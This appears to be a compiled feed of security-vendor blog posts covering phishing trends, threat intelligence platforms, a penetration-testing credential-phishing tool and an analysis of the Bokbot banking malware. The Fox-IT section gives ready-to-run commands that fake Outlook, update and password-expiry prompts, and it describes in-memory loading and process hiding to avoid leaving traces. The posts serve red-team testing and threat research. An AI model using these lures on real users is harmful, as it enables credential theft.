Category Archives: Blog

Inside the Phish: How a Phishing Campaign Really Works

Even with all of the hacks and third party breaches that have plagued some of the biggest global corporations over the past few years, phishing still remains one of the most frequent ways into an organization. It has been reported that up to 93% of all breaches start with a phish.

LookingGlass has broad and deep access to phishing data and insight into phishing campaign techniques for catching phish. We hope that in sharing the “behind-the-scenes” of a phishing attack, your organization can be more prepared to defend against this recurring digital risk.

Year-to-date we have observed the following as some of the top phishing “targets” or brands used as bait:

  • Wells Fargo
  • Microsoft
  • PayPal
  • Dropbox
  • Google

None of these should come as a surprise, as they are all well-known brands with expansive customer bases, and attackers typically cast a wide net in an effort to reach as many victims as possible. For example, if an attacker wants to infiltrate a corporate environment they can make a fairly educated guess that the likelihood of that business using a service such as Microsoft 365 is quite high. Thanks to widely available dumps of email addresses and account information, the attacker just needs to collect a list of email addresses associated with the business, craft their strategically themed phishing email, and then wait for the clicks to commence – and they will most certainly commence.

A common theme we have observed in association with these targets are login pages designed to harvest user credentials. In August, we took a look at a phishing campaign that targeted PayPal. In this instance, the phishing link was hosted on a WordPress site of an apparent victim domain, where the domain owner most likely had no idea that they were serving up malicious content on their site. A visit to the site’s home page revealed a very unobtrusive comment indicating that the site had been “Hacked by Virus-ma” (figure 1):

Virus Ma


Some quick research revealed Virus-ma had at least one hacking-related YouTube video channel.

When a user visits the phishing page via the phishing link, they are presented with an extremely realistic PayPal spoof (figure 2):

PayPal Login Page

Regardless of what credentials the user enters (we obviously did not use legit PayPal credentials in our testing), they will be accepted and the user is directed to the next screen which requests contact information. The screen following that asks for credit card information, social security number, and account number (figure 3):

Update Your Credit/Debit Card

The credit card data is checked in real time, so incorrect or false entries are instantly rejected. Our research did not go beyond this screen as we were not willing to provide legitimate user financial information that could be verified. Also, it is noteworthy that the website is encrypted, which gives a false sense of security to the user, ultimately making them more likely to provide confidential and sensitive information. In this case, the domain used a TLS certificate signed by cPanel (figure 4):


The page source behind these pages revealed some interesting data about the attacker, in which they identify themselves and out the page as being a “scam page” (figure 5):

Phishing Log

At LookingGlass Cyber we see hundreds of phishing attacks like these every day. Trying to prevent them is a daunting task, but with an understanding of the processes behind the phish, organizations can better educate their users about what to avoid as well as put appropriate detection methods in place.

Protect yourself from future phishing attacks here, or contact us.


The post Inside the Phish: How a Phishing Campaign Really Works appeared first on LookingGlass Cyber Solutions Inc..

Can Your SOC Use More Visibility?

The Security Operation Center (SOC) is an intricate ecosystem of personnel, network equipment, cybersecurity appliances, traffic and flow data, all working to manage the workflow from threat alerts. To minimize exposure, a SOC is designed to provide a “defense-in-depth” posture. This comprehensive approach to cybersecurity involves antivirus and endpoint tools, log management, a Next Generation Firewall (NGFW), website defenses, and other complimentary security technologies. However, SOCs have several critical limitations.

The first limitation is “paralysis of analysis.’” With each layer of defense, a level of complexity occurs. For example, a miscreant attempting to access the network may simultaneously trigger alerts for known malware, a rules-based violation from a SIEM, and an extrusion attempt by an end-user from a restricted port found by the NGFW. Redundant alerts are often mixed in with benign alerts from non-security events.

A perimeter defense only activates through alerts or an ongoing breach. Step back and think about this for a second. When a SOC analyst begins a forensic investigation, the analyst only knows that something is wrong. Their first move should be to look for bad malware hashes or perhaps look up IP addresses, fully qualified domain names, DNS, and registered owners to learn about an attack’s origins or what sites an end-user has visited and where malware has been acquired. Historically, SOC teams have had no advanced triage of the external threat environment, and they often must develop strategies on the fly.

Another problem is that traditional SOC strategies assume that threat vectors must always be signature-based. In 2018, the malefactor is pride-less. Often, an adversary can create a damning social media attack against a company’s brand or against individuals—the proverbial “fake news.”

The network is changing to expedite business use cases. From a security perspective, this brings about new challenges. Contractors may need access to a network, and integration partners often share intellectual property on the network to facilitate better operations or integrate to build a deeper security posture. However, contractors and business partners may bring their own sets of vulnerabilities to the host network.

External threat feeds can add to the aggravation. Like flow data, network performance indicators, and the investigation of alerts, external threat feed data is yet another source of information that needs to be normalized and contextualized inside the SOC.

Fundamentally, IDC believes there needs to be an approach that can complement defense-in-depth. With LookingGlass ScoutPrime, we see a platform that:

  • Produces a single risk score called the Threat Indicator Confidence (TIC) score that calculates the potential impact of malware, the topography of connections to the network, and the reliability of the source.
  • Provides a platform that scans the entire Internet which is a greater capability than collecting and normalizing multiple threat feeds.
  • Monitors deceptive proxy activities to spot when adversaries are using APIs, fuzzes, and anagrams of keywords to make a website look authentic.
  • Combines human insight with machine-readable threat intelligence to normalize data in real time. LookingGlass has over 500 algorithms designed to prioritize threat feed data and weed out redundancies.

Defense-in-depth is still effective, and cybersecurity is often the execution of many things done well. However, the next security wave may be to think outside the SOC.

The post Can Your SOC Use More Visibility? appeared first on LookingGlass Cyber Solutions Inc..

ThreatConnect achieves ISO 27001:2013 certification

Continuing our commitment to protect our customers' data

What is ISO 27001?
ISO 27001 is an internationally recognized standard defining requirements for a systematic  approach to managing sensitive information, also known as an information security management  system (ISMS).

But what's an ISMS?
Think of an ISMS as the blueprint for how we identify, assess, and act on or manage risk. Through  our ISMS, we employ functionally verifiable processes to protect your data and our services.

So why does ThreatConnect follow ISO 27001?
ISO 27001 is the gold standard for risk management. It's both specific and comprehensive. When  implementing a security program, it's important to select effective and appropriate security controls. A security program needs to be adaptable and extensible to address changing technologies, industries, and threats. It also needs to be verifiable. The ISO 27001 standard defines a well-understood process that trusted auditors use to examine a submitted ISMS and certify that it conforms to the gold standard.

What does it mean to be certified?
Certification provides verifiable third-party proof of compliance with the standard and guarantees that we have accomplished the following objectives:

  • formally adopted a risk management approach;
  • assessed our information security risks according to this approach;
  • selected an appropriate set of security controls to mitigate these risks;
  • implemented appropriate methodologies and processes to continually monitor and improve the system and its controls;
  • performed an internal audit of the ISMS;
  • received favorable audit results of the ISMS against the ISO 27001:2013 standard by an ISO-accredited third party.

Certification itself doesn't change our ISMS or security practices. It doesn't mean we protect your data any differently than before. It does mean, however, that you can be confident in our security practices. We've not only let an internationally recognized third party examine them, but we've also committed to keep those practices improving on an ongoing basis.

What does it mean for our customers?
ThreatConnect has always been committed to securing customer data. While we didn't have to submit our ISMS for certification, we chose to do so to provide our customers with additional confidence in our commitment to them. Because we follow the ISO 27001:2013 standard, we understand the risks to the data they entrust us with, as well as to our services, and have implemented controls to manage those risks.

Trust is earned, and we understand this. It's ThreatConnect's commitment to continue to show that your trust in us is well founded. For more information about ThreatConnect or our security program, please connect with us.

(Configuration, management, support, and delivery activities related to cloud systems supported by Amazon RDS)

The post ThreatConnect achieves ISO 27001:2013 certification appeared first on ThreatConnect | Enterprise Threat Intelligence Platform.

Playbook Fridays: Document Parsing and Keyword Scanning/Tagging

Automatically tag the documents with keywords and focused areas of interest without human intervention

ThreatConnect developed the Playbooks capability to help analysts automate time consuming and repetitive tasks so they can focus on what is most important. And in many cases, to ensure the analysis process can occur consistently and in real time, without human intervention.

This Playbook is actually a set of 3 playbooks: one that saves the keyword, one that is used to verify the data is saved and what the analyst expected; and the last one that actually performs the work.

Many customers have reached out and voiced frustration because analysts were spending a lot of time looking over various reports for specific keywords and then manually applying tags based upon those keywords. This act was getting very time consuming; especially for one customer, who had 10 separate focus areas with more than 200 different keywords.

With this Playbook set, analysts can automatically tag the documents with keywords and focused areas of interest without human intervention, saving the analyst about 4-5 hours/week.

This Playbook set is triggered with the creation of a document in a source (with a specific tag "parseme" that can be removed as requirement after verifying expected functionality). First, you can set the list of keywords from the datastore contained within ElasticSearch. Then, in JSON, you define a set of keywords and have them grouped and save them as variables. The main Playbook converts the document into a set of strings that is then passed onto the regex capture groups for comparison. For those keywords that match the Playbook, it will create the tag for the group, ie: China/Russia. Additionally, the Playbook will tag the document with the actual keywords within those that match, ie: APT12/APT28 etc.


1)  Import "Populate DataStore with Keywords.pbx"
In this Playbook you set a JSON array with your keywords. There are a few examples already preconfigured out of the box to get you started. This playbook only needs to be ran once to populate the datastore (and any other time the list needs to be updated).

Populate DataStore with Keywords


2) Import Document Keyword Check.pbx
This playbook will need to be set to a specific owner to monitor, and as a safety measure, is currently configured to fire off the tag "parseme". After verifying functionality this tag requirement can be omitted so that it runs each time a document is created.

Document Keyword Check

The post Playbook Fridays: Document Parsing and Keyword Scanning/Tagging appeared first on ThreatConnect | Enterprise Threat Intelligence Platform.

Threat Intelligence Brief: August 28, 2018

Threat Intelligence Briefs

This weekly brief highlights the latest threat intelligence news to provide insight into the latest threats to various industries.


“July 2018 was the worst month of 2018 for healthcare data breaches by a considerable distance. There were 33 breaches reported in July – the same number of breaches as in June – although 543.6% more records were exposed in July than the previous month. The breaches reported in July 2018 impacted 2,292,552 patients and health plan members, which is 202,859 more records than were exposed in April, May, and July combined.”

 –HIPAA Journal


“T-Mobile USA announced a security breach late last night. The company says its cyber-security team discovered and shut down unauthorized access to its customers’ data on Monday, August 20. T-Mobile USA announced a security breach late last night. The company says its cyber-security team discovered and shut down unauthorized access to its customers’ data on Monday, August 20. T-Mobile said the hacker (or hackers) did not gain access to passwords, social security numbers, or any financial information. Impacted customers will receive an SMS, letter in the mail, or a phone call to notify them. The US telco says it informed law enforcement authorities about the breach. A T-Mobile spokesperson told Motherboard that less than 3% of its customerbase was affected. T-Mobile reported 75.62 million customers at the end of Q2 2018. That would put the breach at around 3.9 million customers, still a considerable number. As some T-Mobile users have pointed out, even if the hackers did not get their hands on any financial data or passwords, the breach makes it easier for the attacker to port  (SIM swap) numbers.”


Information Security Risk

“A Necurs botnet has been used to launch a campaign of targeted phishing emails aimed at breaching the cyber defenses of a number of banks. A security vendor said the short-lived phishing campaign began on August 15 and targeted more than 2,700 bank domains. However, after a few hours the attacks abruptly ceased. In the latest short-lived attack, targeted phishing emails were sent to banking employees, most carrying a file with the .pub extension. This extension is used by Microsoft Publisher. “Like Word and Excel, Publisher has the ability to embed macros. However, not all of the emails carried .pub files. Some delivered infected PDF files instead. The infected files featured macros which on opening caused malware to be downloaded to the victim’s machine from a remote server.””


Reputational Risk

“A US bank has agreed to pay a $10.5 million settlement to resolve two separate complaints. The first issue stems from bad loans issued by its Mexican subsidiary to an oil company from 2008-14, which led to losses of $475 million. The second complaint was centered on mismarked illiquid positions and unauthorized proprietary trading from 2013-16. Three traders, now fired, mismarked illiquid positions in proprietary accounts they managed, leading to the covering of losses from widespread unauthorized trading. Regulators allege the bank failed to detect the misconduct sooner because it lacked supervisory procedures and systems to verify the valuations of the mismarked positions. ”

The post Threat Intelligence Brief: August 28, 2018 appeared first on LookingGlass Cyber Solutions Inc..

How to Choose the Right Threat Intelligence Platform for You

Understand its "job" and what you and your team need

The first step to choosing the right threat intelligence platform (TIP) for you is to figure out what you actually want the TIP to do. One pitfall that security teams often fall into is that they approach the selection with a checklist of criteria, without really evaluating the problems they're trying to solve and they end up with a product that "checks all the boxes" but ends up collecting dust.

For example, if you're buying a car, here are some things you might be looking for:

  • Safety, e.g. five star crash-test ratings
  • A decent sound system
  • "Sporty," whatever that means
  • Good gas mileage
  • Lane assist

Those are all admirable features or qualities for a car to have, but consider the reason you're buying the car (in other words, the thing you're buying the car to do):

  • Get the kids to school and soccer practice, and maybe keep them entertained on longer trips
  • Show up the other guys and gals at the firm with their fancy imports
  • Survive the ultimate road trip

The five "features" listed above might all factor into the three "reasons," but imagine if the status-seeker showed up with a minivan, or the soccer parent showed up with a convertible coupe? The features are the same, but the final product, what's really needed, is totally different.

So the first step in selecting a TIP is not picking out the key features - it's nailing down the "job" of a TIP.

What's the "job" of a TIP?

Your mileage may vary, and introspection is certainly keyhere, but for most teams the main jobs of a TIP are:

  1. Aggregation. Get all of my feeds and reports into a central location - a "source of truth" - where they can be accessed in a standardized format by anyone who needs them.
  2. Analysis. Figure out what's really relevant to me and my team. "Is this a threat to me?"
  3. Action. Send the right intel to my detection and defense devices. Some might call this "operationalizing" the intelligence.

Major "check the box" items like DNS lookups, machine-readable threat intelligence, STIX/TAXII, etc., are all features in service of those larger goals. Even key capabilities like automation and orchestration are just better ways of accomplishing the jobs: automation can help make teams more effective in the Analysis job, for example, by streamlining key enrichment tasks. Orchestration can help on the Action side by linking together all manner of disconnected systems.

What matters, though, is how effectively the TIP can actually do the job you want it to do. You're probably doing those jobs today already: with spreadsheets, cutting and pasting, Word docs, custom Python scripts, prayer, etc. The TIP makes you more effective at those jobs.

Let's take a look at how TIP help you accomplish these three key jobs of Aggregation, Analysis, and Action.

Aggregation - Get All Your Stuff in One Place

The first job you might want to hire a TIP for is to centralize all of your intelligence. So the question is, what intelligence are you collecting today, and how do you receive it? Consider making a checklist of the intelligence and its delivery mechanism. It might look something like this:

Intelligence Delivery Mechanism
Premium feed Proprietary API and PDF reports
ISAC alerts Sent via email in plain text or STIX
My favorite researcher blog Website
Internal network activity Available in my SIEM
Internal threat reports Spreadsheets and corporate wiki
Open source feed TAXII

Once you understand what you want to bring in, you can start to review how effective the TIP is at adding the data. For example, does the TIP have native integrations with your premium feeds, or would you need to write something custom (and possibly hire software developers)? Can the TIP automatically extract indicators from your ISAC alert emails, or would your analysts need to cut and paste? Understanding how the TIP "gets the job done" can help you understand how effective that TIP is at doing the job. For example:

Intelligence TIP #1 TIP #2
Premium feed Native integration and in-app PDF report display Native integration
ISAC alerts Parses email alerts and converts into machine-readable threat intelligence (MRTI) Cut and paste
My favorite researcher blog Aggregates popular blogs and converts into MRTI Cut and paste or custom script for web scraping
Internal network activity Bidirectional integration with my SIEM Requires custom app
Internal threat reports SDK and API allows integration with internal wiki Not available
Open source feed TAXII client TAXII client

While both TIPs in the above example have ways to do the job, TIP #1 is going to be more effective.

Analysis - Weed out the Irrelevant Stuff

Once you've collected the data, the next step is to identify the relevant intelligence so you can take action while avoiding false positives. Just like with the "Aggregate" job, the first step is to lay out what sort of analysis you want to do:

  • Check log files for malicious indicators
  • Look up data in third party enrichment tools
  • Monitor your domains for spoofing attempts
  • Analyze malware files
  • Track threat actors across multiple campaigns
  • Weed out false positives

And once again, we look to see how each TIP accomplishes the job you want it to do:

Analysis TIP #1 TIP #2
Check log files for malicious indicators Drag-and-drop files for immediate analysis and enrichment Import files, manually parse out indicators, and review
Look up data in third party enrichment tools Automate lookups in any enrichment service that offers a REST API Out of the box integrations with several (but limited) popular enrichment services
Monitor your domains for spoofing attempts Domain-spinning workbench Domain monitoring for-hire
Analyze malware files Automate analysis in multiple third party AMAs Integrated sandbox, limited support for other AMAs
Track threat actors across multiple campaigns Flexible data model aligned to the Diamond Model of Intrusion Analysis Rigid data model with some Kill Chain support
Weed out false positives Globally crowdsourced reports of known false positives Manual tagging

Analysis can be more challenging to evaluate than aggregation because there are so many more options, but that's okay: what's important is that you understand what your team needs and what the TIP provides. For example, if your team is just ramping up and needs room to grow, you'll want a TIP that offers some basic enrichment while still being extensible. If you have a mature team, you'll want one that is flexible enough to adapt to your processes (rather than the other way around).

Action - Send the Relevant Stuff Where It Can Protect You

Getting intelligence out of a TIP is just as important as getting data in. I'd argue that, while taking Action depends on Aggregation and Analysis, Action is the most important job a TIP can do for you.

Action Destination
Deploy to defensive devices SIEM, EDR, firewall, etc.
Publish internal intelligence Security team, executives, risk management
Publish external intelligence ISAC, sharing community, law enforcement
Loop in other teams on critical intel SOC, Incident Response, IT, etc.

So really, the question becomes: what form do you want your intelligence to take, and where do you need it to go?

Action TIP #1 TIP #2
Deploy to defensive devices Integrations, rule-based runtime apps, flexible automation/orchestration engine Integrations, rule-based runtime apps
Publish internal intelligence Export, PDFs, integrations with ticketing systems, scheduled delivery Export
Publish external intelligence TAXII server, export, anonymous crowdsourced analytics TAXII server, export
Loop in other teams on critical intel In-app notifications, email, Slack Email

There's a wide variety of possible outputs, so due to the importance of the Action job it's worthwhile to take the time to assess the desired end state of your intelligence, and how that end state is achieved with any particular TIP.

A Word on Orchestration

I've mentioned several instances above where the job being done is accomplished by way of orchestration or automation. With all the buzz around orchestration, it can be tempting to think that orchestration is something separate from what you want out of a TIP, but that's a mistake. Orchestration is simply a means to an end. If orchestration can make the job you want the TIP to do more effective, then why not consider a TIP with orchestration?

Consider seat belts, airbags, and lane assist. All of those features are designed to do the job of keeping you safe and contribute in different ways and with different levels of effectiveness. Orchestration in a TIP is no different. For example, you might need to detonate malware in an Automated Malware Analysis (AMA) tool. There's lots of ways to accomplish that from a TIP:

  1. Download a file from the TIP and manually upload it to the AMA
  2. Use the TIP's build-in sandbox
  3. Use the TIP's out-of-the-box AMA integration
  4. Use a TIP's orchestration capability to automatically send malware to an AMA, detonate it, retrieve the results, and get notified if something relevant is found

In all four cases, the job being done is the same: malware analysis. What's different is the tools being used and how effective the TIP is at getting the job done resulting in significant time savings. In nearly every case, orchestration is a fantastic tool for making a TIP more effective and a better fit for the specific job you need done for the simple reason that orchestration gives you total control over how that job is performed.

In the end, when we talk about selecting a TIP based on what you and your team need it to do, keep these tips in mind:

  1. Make a checklist of what you and your team need the TIP to aggregate, analyze, and operationalize. Don't rely on a wishlist of features, rely on the jobs you want done.
  2. For each item on the list, consider how it's being done now.
  3. For every TIP you're evaluating, consider how that TIP accomplishes the jobs on your checklist.
  4. Remember that orchestration is just another way to accomplish one of those jobs.

Want to learn more? Sign up for a TC Open account! It's Free

TC Open™ is a completely free way for individual researchers to get started with threat intelligence. While this is not a free trial of the full platform, TC Open allows you to see and share open source threat data, with support and validation from our free community.

The post How to Choose the Right Threat Intelligence Platform for You appeared first on ThreatConnect | Enterprise Threat Intelligence Platform.

Phishing – Ask and ye shall receive

During penetration tests, our primary goal is to identify the difference in paths that can be used to obtain the goal(s) as agreed upon with our customers. This often succeeds due to insufficient hardening, lack of awareness or poor password hygiene. Sometimes we do get access to a resource, but do not have access to the username or password of the user that is logged on. In this case, a solution can be to just ask for credentials in order to increase your access or escalate our privileges throughout the network. This blogpost will go into the details of how the default credential gathering module in a pentesting framework like MetaSploit can be further improved and introduces a new tool and a Cobalt Strike module that demonstrates these improvements.

Current situation

Let’s say that we have a meterpreter running on our target system but were unable to extract user credentials. Since the meterpreter is not running with sufficient privileges, we also cannot access the part of the memory where the passwords reside. To ask the user for their credentials, we can use a post module to spawn a credential box on the user’s desktop that asks for their credentials. This credential box looks like the one in the image below.


While this often works in practice, a few problems arise with using this technique:

  • The style of the input box stems from Windows XP. When newer versions of Windows ask for your credentials, a different type of input box is used;
  • The credential box spawns out-of-the-blue. Even though a message and a title can be provided, it does not really look genuine; it misses a scenario where a credential box asking for your credentials can be justified.

A better solution

Because of these issues, this technique will perhaps not work on more security aware users. These users can be interesting targets as well, so we created a new script that solves the aforementioned problems. For creating a realistic scenario, the main approach was: “What would work on us?” The answer to this question must at least entail the following:

  • The credential box should be genuine and the same as the one that Windows uses;
  • The credential box should not be spawned out-of-the-blue; the user must be persuaded or should expect a credential box;
  • If (error) messages are used, the messages should be realistic. Real life examples are even better;
  • No or limited visible indications that the scenario is not real.

As a proof of concept, Fox-IT created a tool that uses the following two scenario’s:

  • Notifications that stem from an (installed) application;
  • System notifications that can be postponed.

With this, the attacker can use his creativity to deceive the user. Below are some examples that were created during the development of this tool:

Outlook lost connection to Microsoft Exchange. In order to reconnect, the user must specify credentials to reestablish connection to Microsoft Exchange.


Password that expires within a short period of time.


The second scenario imitates notifications from Windows itself, such as pending updates that need to be installed. The notification toast tricks the user into thinking that the updates can be postponed or dismissed. When the user clicks on the notification toast the user will be asked to supply their credentials.


If the user clicks on one of these notifications, the following credential box will pop up. The text of the credential box is fully customizable.


Once the user has submitted their credentials, the result is printed on the console which can be intercepted with a tool of your choosing, such as Cobalt strike. We created an aggressor script for Cobalt Strike that extends the user interface with a variety of phishing options.


Clicking on one of these options will launch the phishing attack on the remote computer. And if users enter their credentials, the aggressor script will store these in Cobalt Strike as well. The tool as well as the Cobalt Strike aggressor script are available on Fox-IT’s GitHub page:


Technical details

During the development of this tool, there were some hurdles that we needed to take. At first, we created a tool that pops a notification balloon. That worked quite well, however, the originating source of the balloon was mentioned in the balloon as well. It’s not really genuine when Windows Powershell ISE asks for Outlook credentials, so that was not a solution that satisfied us.


In recent versions of Windows, toast notifications were introduced. These notifications look almost the same as a notification balloon that we used earlier, but work entirely different. By using toast notifications, the problem that the originating source was shown was solved. However, it proved not possible to use event handlers on the toast notifications with native PowerShell. We needed an additional library that acts as a wrapper, which can be found on the following GitHub page:

That library solved one part of the issue, but needed to be present on the filesystem of the target computer. That leaves traces of our attack which we do not want, plus, we want to leave the least amount of traces of our malicious code. Therefore, we encoded the library as base64 and stored that in the PowerShell script. The base64 equivalent of the library is evaluated and loaded from memory during runtime and will leave no trace on the filesystem once the tool has been executed. So, now we had a tool capable of sending toast notifications that look genuine. Because of how Windows works, we could also create an extra layer of trust by using an application ID as the source of the notification toast. That way, if you were able to find the corresponding AppID, it looks like the toast notification was issued by the application rather than an attacker.

The notifcation toasts supports the following:

  • Custom toast notification title;
  • Custom credential box title;
  • Custom multiline toast notification message.

To make it more personal, it is possible to use references to attributes that are part of the System.DirectoryServices.AccountManagement.UserPrincipal object. These attributes can be found on the following Technet article: Additionally, the application scenario supports the following extra features when an application name is provided and can be found by the tool:

  • AppID lookup for adding extra layer of credibility. If no AppID is found, the tool will default to control panel;
  • Extraction of the application icon. The extracted icon will be used in the notification toast;
  • If no process is given or the process cannot be found, the tool will extract the information icon from the C:\Windows\system32\shell32.dll library. By modifying the script, it is easy to incorporate icons from other libraries as well;
  • Hiding of application processes. All windows will be hidden from the user for extra persuasion. The visibility will be restored once the tool is finished or when the user supplied their credentials.

Cmdline examples

For the examples above, the following onliners were used:

Outlook connection:

.\Invoke-CredentialPhisher.ps1 -ToastTitle "Microsoft Office Outlook" -ToastMessage "Connection to Microsoft Exchange has been lost.`r`nClick here to restore the connection" -Application "Outlook" -credBoxTitle "Microsoft Outlook" -credBoxMessage "Enter password for user ‘{emailaddress|samaccountname}'" -ToastType Application -HideProcesses

Updates are available:

.\Invoke-CredentialPhisher.ps1 -ToastTitle "Updates are available" -ToastMessage "Your computer will restart in 5 minutes to install the updates" -credBoxTitle "Credentials needed" -credBoxMessage "Please specify your credentials in order to postpone the updates" -ToastType System -Application "System Configuration"

Password expires:

.\Invoke-CredentialPhisher.ps1 -ToastTitle "Consider changing your password" -ToastMessage "Your password will expire in 5 minutes.`r`nTo change your password, click here or press CTRL+ALT+DELETE and then click 'Change a password'." -Application "Control Panel" -credBoxTitle "Windows Password reset" -credBoxMessage "Enter password for user '{samaccountname}'" -ToastType Application


There are no specific recommendations that are applicable to this phishing technique, however, some more generic recommendations are still applicable:

  • Check if PowerShell script logging and transcript logging is enabled;
  • Raise security awareness;
  • Although it is quite hard to distinguish a fake notification toast from a genuine notification toast, users should have a paranoid approach when it comes to processes asking for their credentials.

Bokbot: The (re)birth of a banker

This blogpost is a follow-up to a presentation with the same name, given at SecurityFest in Sweden by Alfred Klason.


Bokbot (aka: IcedID) came to Fox-IT’s attention around the end of May 2017 when we identified an unknown sample in our lab that appeared to be a banker. This sample was also provided by a customer at a later stage.

Having looked into the bot and the operation, the analysis quickly revealed that it’s connected to a well-known actor group that was behind an operation publically known as 76service and later Neverquest/Vawtrak, dating back to 2006.

Neverquest operated for a number of years before an arrest lead to its downfall in January 2017. Just a few months afterwards we discovered a new bot, with a completely new code base but based on ideas and strategies from the days of Neverquest. Their business ties remains intact as they still utilize services from the same groups as seen before but also expanded to use new services.

This suggests that at least parts of the group behind Neverquest is still operating using Bokbot. It’s however unclear how many of the people from the core group that have continued on with Bokbot.

Bokbot is still a relatively new bot, just recently reaching a production state where they have streamlined and tested their creation. Even though it’s a new bot, they still have strong connections within the cybercrime underworld which enables them to maintain and grow their operation such as distributing their bot to a larger number of victims.

By looking back in history and the people who are behind this, it is highly likely that this is a threat that is not going away anytime soon. Fox-IT rather expects an expansion of both the botnet size and their target list.

76service and Neverquest

76service was, what one could call, a big-data mining service for fraud, powered by CRM (aka: Gozi). It was able to gather huge amounts of data from its victims using, for example, formgrabbing where authorization and log-in credentials are retrieved from forms submitted to websites by the infected victim.

76service panel login page (source:

76service login page (source:

The service was initially spotted in 2006 and was put into production in 2007, where the authors started to rent out access to their platform. When given access to the platform, the fraudulent customers of this service could free-text search in the stolen data for credentials that provide access to online services, such as internet banking, email accounts and other online platforms.

76service operated uninterrupted until November 2010, when an Ukrainian national named Nikita Kuzmin got arrested in connection with the operation. This marked the end of the 76service service.

Nice Catch! – The real name of Neverquest

A few months before the arrest of Nikita he shared the source code of CRM within a private group of people which would enable them to continue the development of the malware. This, over time, lead to the appearance of multiple Gozi strains, but there was one which stood out more than the others, namely: Catch.

Catch was the name given internally by the malware authors, but to the security community and the public it was known as Vawtrak or Neverquest.

During this investigation into Catch it became clear that 76service and Catch shared several characteristics. They both, for example, separated their botnets into projects within the panel they used for administering their infrastructure and botnets. Instead of having one huge botnet, they assigned every bot build with a project ID that would be used by the bot to let the Command & Control (C2) server know which specific project the bot belonged to.

76service and Catch also shared the same business model, where they shifted back and forth between a private and rented model.

The private business model meant that they made use of their own botnet, for their own gain, and the rented business model meant that they rented out access to their botnet to customers. This provided them with an additional income stream, instead of only performing the fraud themselves.

The shift between business models could usually be correlated with either: backend servers being seized or people with business ties to the group being arrested. These types of events might have spooked the group as they limited their infrastructure, closing down access for customers.

For the sake of simplicity, Catch will from here on be referred to as Neverquest in this post.

“Quest means business” – Affiliations

If one would identify a Neverquest infection it might not be the only malware that is lurking on the infected system. Neverquest has been known to cooperate with other crimeware groups, either to distribute additional malware or use existing botnets to distribute Neverquest.

During the investigation and tracking of Neverquest Fox-IT identified the following ties:

Crimeware/malware group Usage/functionality
Dyre Download and execute Dyre on Neverquest infections
TinyLoader & AbaddonPOS Download and execute TinyLoader on Neverquest infections. TinyLoader was later seen downloading AbaddonPOS (as mentioned by Proofpoint)
Chanitor/Hancitor Neverquest leverages Chanitor to infect new victims.

By leveraging these business connections, especially the connection with Dyre, Neverquest is able to maximize the monetization of the bots. This since Neverquest could see if a bot was of interest to the group and if not, it could be handed off to Dyre which could cast a wider net, targeting for example a bigger or different geographical region and utilize a bot in a different way.

More on these affiliations in a later section.

The never ending quest comes to an end

Neverquest remained at large from around 2010, causing huge amounts of financial losses, ranging from ticket fraud to wire fraud to credit card fraud. Nevertheless, in January 2017 the quest came to an end, as an individual named Stanislav Lisov was arrested in Spain. This individual was proven to be a key player in the operation: soon after the arrest the backend servers of Neverquest went offline, never to come back online, marking the end of a 6 year long fraud operation.

A more detailed background on 76service and Neverquest can be found in a blogpost by PhishLabs.

A wild Bokbot appears!

Early samples of Bokbot were identified in our lab in May 2017 and also provided to us by a customer. At this time the malware was being distributed to US infections by the Geodo (aka: Emotet) spam botnet. The name Bokbot is based on a researcher who worked on the very early versions of the malware (you know who you are 😉 ).

Initial thoughts were that this was a new banking module for Geodo, as this group had not been involved in banking/fraud since May 2015. This scenario was quickly dismissed after having discovered evidence that linked Bokbot to Neverquest, which will be further outlined hereafter.

Bokbot internals

First, let’s do some housekeeping and look into some of the technical aspects of Bokbot.


All communication between a victim and the C2 server is sent over HTTPS using POST- and GET-requests. The initial request sent to the C2 is a POST-request containing some basic information about the machine it’s running on, as seen in the example below. Any additional requests like requesting configs or modules are sent using GET-requests, except for the uploading of any stolen data such as files, HTML code, screenshots or credentials which the victim submits using POST-requests.

Even though the above request is from a very early version (14) of the bot, the principle still applies to the current version (101), first seen 2018-07-17.

URL param. Comment
b Bot identifier, contains the information needed to identify the individual bot and where it belongs. More information on this in later a section.
d Type of uploaded information. For example screenshot, grabbed form, HTML or a file
e Bot build version
i System uptime
POST-data param. Comment
k Computer name (Unicode, URL-encoded)
l Member of domain… (Unicode, URL-encoded)
j Bot requires signature verification for C2 domains and self-updates
n Bot running with privilege level…
m Windows build information (version, arch., build, etc.)

The parameters that are not included in the table above are used to report stolen data to the C2.

The C2 response of this particular bot version is a simple set of integers which tells the bot which command(s) that should be executed. This is the only C2 response that is unencrypted, all other responses are encrypted using RC4. Some responses are, like the configs, also compressed using LZMAT.

After a response is decrypted, the bot will check if the first 4 bytes equal “zeus”.


If the first 4 bytes are equal to “zeus”, it will decompress the rest of the data.

The reason for choosing “zeus” as the signature remains unknown, it could be an intentional false flag, in an attempt to trick analysts into thinking that this might be a new ZeuS strain. Similar elusive techniques have been used before to trick analysts. A simpler explanation could be that the developer simply had an ironic sense of humor, and chose the first malware name that came to mind as the 4 byte signature.


Bokbot supports three different types of configs, which all are in a binary format rather than some structured format like XML, which is, for example, used by TheTrick.

Config Comment
Bot The latest C2 domains
Injects Contains targets which are subject to web injects and redirection attacks
Reporting Contains targets related to HTML grabbing and screenshots

The first config, which includes the bot C2 domains, is signed. This to prevent that a takeover of any of the C2 domains would result in a sinkholing of the bots. The updates of the bot itself are also signed.

The other two configs are used to control how the bot will interact with the targeted entities, such as redirecting and modifying web traffic related to for example internet banking and/or email providers, for the purpose of harvesting credentials and account information.

The reporting config is used for a more generic purpose, where it’s not only used for screenshots but also for HTML grabbing, which would grab a complete HTML page if a victim browses to an “interesting” website, or if the page contains a specific keyword. This enables the actors to conduct some reconnaissance for future attacks, like being able to write web injects for a previously unknown target.

Geographical foothold

Ever since the appearance Bokbot has been heavily focused on targeting financial institutions in the US even though they’re still gathering any data that they deem interesting such as credentials for online services.

Based on Fox-IT’s observation of the malware spread and the accompanied configs we find that North America seems to be Bokbot’s primary hunting ground while high infection counts have been seen in the following countries:

  • United States
  • Canada
  • India
  • Germany
  • Netherlands
  • France
  • United Kingdom
  • Italy
  • Japan

“I can name fingers and point names!” – Connecting the two groups

The two bots, on a binary level, do not show much similarity other than the fact that they’re both communicating over HTTPS and use RC4 in combination with LZMAT compression. But this wouldn’t be much of an attribution as it’s also a combination used in for example ZeuS Gameover, Citadel and Corebot v1.

The below tables provides a short summary of the similarities between the groups.

Connection Comment
Bot and project ID format The usage of projects and the bot ID generation are unique to these groups along with the format that this information is communicated to the C2.
Inject config The injects and redirection entries are very similar and the format haven’t been seen in any other malware family.
